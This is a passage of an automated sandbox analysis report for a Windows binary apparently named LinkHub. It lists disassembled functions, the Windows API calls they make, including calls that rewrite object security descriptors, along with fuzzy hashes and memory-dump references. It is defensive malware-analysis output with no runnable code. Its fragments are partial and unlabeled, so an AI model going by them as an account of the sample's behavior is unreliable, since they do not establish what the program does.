Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 83a4b94718add929677f3231f718285fc21a6e8a9f380b462adc7b2f48b79f03
Instruction ID: f5ac1772ed00abea2ddd298debd98beeb59614d1435705950cff4c32972f8535
Opcode Fuzzy Hash: 83a4b94718add929677f3231f718285fc21a6e8a9f380b462adc7b2f48b79f03
Instruction Fuzzy Hash: 5532E274A142169FCB20CF68C885ABEB7B5FF49314F19909AE916AB351C730EE45CB60

Function 00E57AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 2f5cb2a13fb4cbe6b27132add74d04a5384dd8f3c7f5083ba48d9ebe82d7a488
Instruction ID: 602a41842524385bf005e7c45d70df487a2ade929f6299c5dd415d995ab03283
Opcode Fuzzy Hash: 2f5cb2a13fb4cbe6b27132add74d04a5384dd8f3c7f5083ba48d9ebe82d7a488
Instruction Fuzzy Hash: 06D17A34E04209EFCB14EF98D8819EDBBB5FF48314F14445AE955AB391DB30AE95CBA0

Function 00DFF106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ccd5d3b51788bc1359399f3ec4f4ec7b7122eef8bbff2d1bef4340f54889bb9
Instruction ID: 6226004769ea141dfe917636f37e336b7e89ede0f22cbf39c76b0980181d1235
Opcode Fuzzy Hash: 5ccd5d3b51788bc1359399f3ec4f4ec7b7122eef8bbff2d1bef4340f54889bb9
Instruction Fuzzy Hash: F451A575A0024CAFDB10DF68C841AB97BA1EF85364F1EC168E958DB391D771ED42CB60

Function 00DD6679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00DD663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DD668B,?,?,00DD62FA,?,00000001,?,?,00000000), ref: 00DD664A
Part of subcall function 00DD663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00DD665C
Part of subcall function 00DD663E: FreeLibrary.KERNEL32(00000000,?,?,00DD668B,?,?,00DD62FA,?,00000001,?,?,00000000), ref: 00DD666E

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00DD62FA,?,00000001,?,?,00000000), ref: 00DD66AB

Part of subcall function 00DD6607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E15657,?,?,00DD62FA,?,00000001,?,?,00000000), ref: 00DD6610
Part of subcall function 00DD6607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00DD6622
Part of subcall function 00DD6607: FreeLibrary.KERNEL32(00000000,?,?,00E15657,?,?,00DD62FA,?,00000001,?,?,00000000), ref: 00DD6635

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 24e106e0890e15ca1dd4554946df34fa336be4138ffb87352d2eeab6432ff7db
Instruction ID: 9e86554bbba1c7583dba69da64d2809cdfcc23f8897897df3f7aef9aa64a95c4
Opcode Fuzzy Hash: 24e106e0890e15ca1dd4554946df34fa336be4138ffb87352d2eeab6432ff7db
Instruction Fuzzy Hash: 2211E772640205AACF14AF60CC02BAD7BA5DF50754F10846FF482A62C2DEB1DA05DBF0

Function 00E08782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00E087C0

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: d6c9aff03e0ec5fa6163e7f8f77c883b7165be9b0eed7ef49abaaf070a9557ff
Instruction ID: dfdef528b34b7ac682ec35f84fa7029ceb7d6ef3dc7c8cf2dc569a3831d640a1
Opcode Fuzzy Hash: d6c9aff03e0ec5fa6163e7f8f77c883b7165be9b0eed7ef49abaaf070a9557ff
Instruction Fuzzy Hash: BD115A7290420AAFCF05DF98E9419DE7BF4EF48300F1040A9F808EB351DA31EA11CB64

Function 00E05373 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E04FF0: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00E0319C,00000001,00000364,?,00DF0165,?,?,00E411D9,0000FFFF), ref: 00E05031

_free.LIBCMT ref: 00E053DF

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
Instruction ID: 8a839f016e527da83a8794c3f6a97e68bc50a5fdbc737a6cb4a4870f3dc08229
Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
Instruction Fuzzy Hash: 0701D6B32007056BE3218E69DC8695AFBEDEB85370F65051DE584A72C0EA70A9458B74

Function 00DFE972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4624603760d48ad0bd9b94422b8c27d6f3f6d6689bf5384beaeb8052d0d19255
Instruction ID: 02f677cb732080efea25291ec793d1fb3e186d44b30a0421c79adb728535b55a
Opcode Fuzzy Hash: 4624603760d48ad0bd9b94422b8c27d6f3f6d6689bf5384beaeb8052d0d19255
Instruction Fuzzy Hash: CEF0F93250062856D6313B2A9C05B7A33D9CF42334F168716F7A5A31E1DFB0D8418AF2

Function 00DDB329 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DDB333

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 92a6b9fc4d488c06443c030f8f88c35764cf037f1adb821f9c99eba6a8e571cc
Instruction ID: 2e23c0901be727f3c0635ee6213b4dfc8ff027e98dbc9460926aef4dc0b97d25
Opcode Fuzzy Hash: 92a6b9fc4d488c06443c030f8f88c35764cf037f1adb821f9c99eba6a8e571cc
Instruction Fuzzy Hash: A6F0A4B2601704AED7149F29D806B66BB98EB44360F51C12AFB19CB2D1DB31E5108AB0

Function 00E4F94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00E4F987

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: cd64591936d7638a9aee1c6c9ea87e6c14c23ce7a1a9c9687521ffcbc6825744
Instruction ID: 3baef6604416fcc55f6873b6f77858cfd0fce351f614ef1b668ee366551abb35
Opcode Fuzzy Hash: cd64591936d7638a9aee1c6c9ea87e6c14c23ce7a1a9c9687521ffcbc6825744
Instruction Fuzzy Hash: F6F01D72600208BFCB15EBA5DC46D9E7BB8EF55710F014055F605AB261DA70A941CB71

Function 00E04FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00E0319C,00000001,00000364,?,00DF0165,?,?,00E411D9,0000FFFF), ref: 00E05031

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4a63f936851fd88415fb9e798692cd84566aec677d04aeb8da0d570f632dede3
Instruction ID: c5f06a8c5a8684f70feba17415fb8b79db23ed8cecb18d255c81a066ee5ee731
Opcode Fuzzy Hash: 4a63f936851fd88415fb9e798692cd84566aec677d04aeb8da0d570f632dede3
Instruction Fuzzy Hash: 5AF0BE33655E24AADB312A66AC01B6F3748EF427E0F16A021B904BB0D0DA70D8858EF0

Function 00E03B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00DF0165,?,?,00E411D9,0000FFFF), ref: 00E03BC5

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 00b7a13d76403fce6ab9d822cacb427e135d0285e669cdbef3414645e2e68d99
Instruction ID: f9f22a50a0c0147fb88bbfda3b65a1353d4d4b8ce73c47625c1301391d83836d
Opcode Fuzzy Hash: 00b7a13d76403fce6ab9d822cacb427e135d0285e669cdbef3414645e2e68d99
Instruction Fuzzy Hash: 70E0E52120062466DA20267BAC01BAB3A4CDF023ADF161120ED45B64D0EFB0CE8089B0

Function 00DD66E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b5f205cfb4ca2fcff8797fe16428d6bb893c9aad06d26bfb69b39bf61906cc8
Instruction ID: 58f2a1134611984360decab74014c3a5403d07b410794ab3bcb53487a0313262
Opcode Fuzzy Hash: 8b5f205cfb4ca2fcff8797fe16428d6bb893c9aad06d26bfb69b39bf61906cc8
Instruction Fuzzy Hash: CAF03971545702DFCB349F64D8A0866BBF4BF14329324897EE2D796A20C771D884DFA0

Function 00DD684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00DD6868

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction ID: 033c8784f1e8e1e9f9a7ab64e6b51160ef9d3d752fb2fe5a8519e9996699c7c9
Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
Instruction Fuzzy Hash: 20F0F87650020DFFDF05DF90C941EAE7B79FB04318F208445F9159A251C336EA61ABA1

Function 00DD3907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 00DD3963

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 36a5889bff4beb4ba5084858c003a8e32259ba5f364154e2a9a9899401f3001f
Instruction ID: 073a9bc0b212eaba0020a8c8ee8daa430ab93c60d59cddf8ed3ea474258de4bf
Opcode Fuzzy Hash: 36a5889bff4beb4ba5084858c003a8e32259ba5f364154e2a9a9899401f3001f
Instruction Fuzzy Hash: BBF037719143199FEB529F29DC457967BBCA706708F0400E9E748B6281DBB45B8CCF51

Function 00DD3A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00DD3A76

Part of subcall function 00DD8577: _wcslen.LIBCMT ref: 00DD858A

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 2dc2a886adf689e67b81a5e669ce167ea5825e80bf3da90dbbcf1fcc1e186a0a
Instruction ID: 78362a0758fda9c53038c16c5da082497f30f95dc117b7387495bfac612a5cde
Opcode Fuzzy Hash: 2dc2a886adf689e67b81a5e669ce167ea5825e80bf3da90dbbcf1fcc1e186a0a
Instruction Fuzzy Hash: 98E08672A041285BC7119258AC05FDA77DDDB88790F044075FD05E7254D9A49D8095A0

Function 00E3E83E Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00E3E857

Part of subcall function 00DD8577: _wcslen.LIBCMT ref: 00DD858A

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: FolderPath_wcslen
String ID:
API String ID: 2987691875-0
Opcode ID: 4bd1dff8a411082a605fc0d4c961f260ce32d695a54e11636d53fde243cf872f
Instruction ID: 538c8476cab7184db259a9a3e9dcb09c6f1abaf79d58060f0325dbabaaa4f800
Opcode Fuzzy Hash: 4bd1dff8a411082a605fc0d4c961f260ce32d695a54e11636d53fde243cf872f
Instruction Fuzzy Hash: 32D05EA1E002282FDF60A675AC0DDBB3AACC744250F0006A1786DD3152ED70EE4486B0

Function 00E412EB Relevance: 1.5, APIs: 1, Instructions: 20threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_000712D1,00000000,00000000,?), ref: 00E41306

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 2a7e7abef1c0147418b6c7f350fd7d66829ae3f4897d5fa5f92da442710e584c
Instruction ID: 5931658dc910ddd12d13b737b12c516082f1c67e8682a0409bf39864aadba671
Opcode Fuzzy Hash: 2a7e7abef1c0147418b6c7f350fd7d66829ae3f4897d5fa5f92da442710e584c
Instruction Fuzzy Hash: 54D09EB1526314BF9F2C9B55ED4ACA77ADCEA06655380256EB402F2940F6E0FD40CAA4

Function 00E1071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00E10A84,?,?,00000000,?,00E10A84,00000000,0000000C), ref: 00E10737

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_dd0000_LinkHub.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d37b5ad3c41bfdad17e9132c146bb031d200dc06b9880255dacc9676a5307ea8
Instruction ID: d4113164777cc4af6beba8a986aad7bd27e3bcc5a86145991e4cc5e27495b1c1
Opcode Fuzzy Hash: d37b5ad3c41bfdad17e9132c146bb031d200dc06b9880255dacc9676a5307ea8
Instruction Fuzzy Hash: 83D06C3210010DBFDF028F85ED06EDA3BAAFB4C754F014000FE5866020C772E821AB90

Non-executed Functions

Function 00E314AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E31A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E31A60
Part of subcall function 00E31A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00E314E7,?,?,?), ref: 00E31A6C
Part of subcall function 00E31A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E314E7,?,?,?), ref: 00E31A7B
Part of subcall function 00E31A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E314E7,?,?,?), ref: 00E31A82
Part of subcall function 00E31A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E31A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E31518
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E3154C
GetLengthSid.ADVAPI32(?), ref: 00E31563
GetAce.ADVAPI32(?,00000000,?), ref: 00E3159D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E315B9
GetLengthSid.ADVAPI32(?), ref: 00E315D0
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00E315D8
HeapAlloc.KERNEL32(00000000), ref: 00E315DF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E31600
CopySid.ADVAPI32(00000000), ref: 00E31607
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E31636
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E31658
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E3166A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E31691
HeapFree.KERNEL32(00000000), ref: 00E31698
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E316A1
HeapFree.KERNEL32(00000000), ref: 00E316A8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E316B1
HeapFree.KERNEL32(00000000), ref: 00E316B8
GetProcessHeap.KERNEL32(00000000,?), ref: 00E316C4
HeapFree.KERNEL32(00000000), ref: 00E316CB

Part of subcall function 00E31ADF: GetProcessHeap.KERNEL32(00000008,00E314FD,?,00000000,?,00E314FD,?), ref: 00E31AED
Part of subcall function 00E31ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00E314FD,?), ref: 00E31AF4
Part of subcall function 00E31ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00E314FD,?), ref: 00E31B03

Memory Dump Source

Source File: 00000024.00000002.2088298175.0000000000DD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00DD0000, based on PE: true

Associated: 00000024.00000002.2088274741.0000000000DD0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E6D000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088351641.0000000000E93000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088405227.0000000000E9D000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000024.00000002.2088427415.0000000000EA5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

